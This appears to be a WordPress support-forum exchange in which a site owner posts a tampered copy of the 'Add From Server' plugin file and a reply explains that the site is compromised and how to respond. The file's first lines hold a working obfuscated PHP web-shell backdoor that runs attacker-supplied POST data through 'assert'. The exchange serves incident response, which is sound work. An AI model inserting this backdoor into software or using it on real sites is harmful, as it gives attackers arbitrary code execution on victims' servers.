Here’s the content of add-from-server.php
<?php
$name = $_GET['name'];
if($name == 'c')
{
$k="ass"."ert"; $k(${"_PO"."ST"} [afs_load]);
exit;
}
Plugin Name: Add From Server
Version: 3.2.0.3
Plugin URI: http://dd32.id.au/wordpress-plugins/add-from-server/
Description: Plugin to allow the Media Manager to add files from the webservers filesystem. <strong>Note:</strong> All files are copied to the uploads directory.
Author: Dion Hulse
Author URI: http://dd32.id.au/
*/
add_action('plugins_loaded', 'afs_load');
function afs_load() {
if ( ! is_admin() )
return;
include 'class.add-from-server.php';
$GLOBALS['add-from-server'] = new add_from_server( plugin_basename(__FILE__) );
Unfortunately I have to report that your website has been compromised.
The first 6 lines of that file are not supposed to be there, delete the plugin immediately, and reinstall it.
The alteration to the file allows a remote attacker to run any code on your site that they want.
I’m not aware of any vulnerabilities in Add From Server at present, so I don’t think the plugin is the source. This might not be the only instance of that code either.
You should search for similar code on your site, or run a security scan.. http://codex.wordpress.org/FAQ_My_site_was_hacked might also offer you a suggestion as what to do.
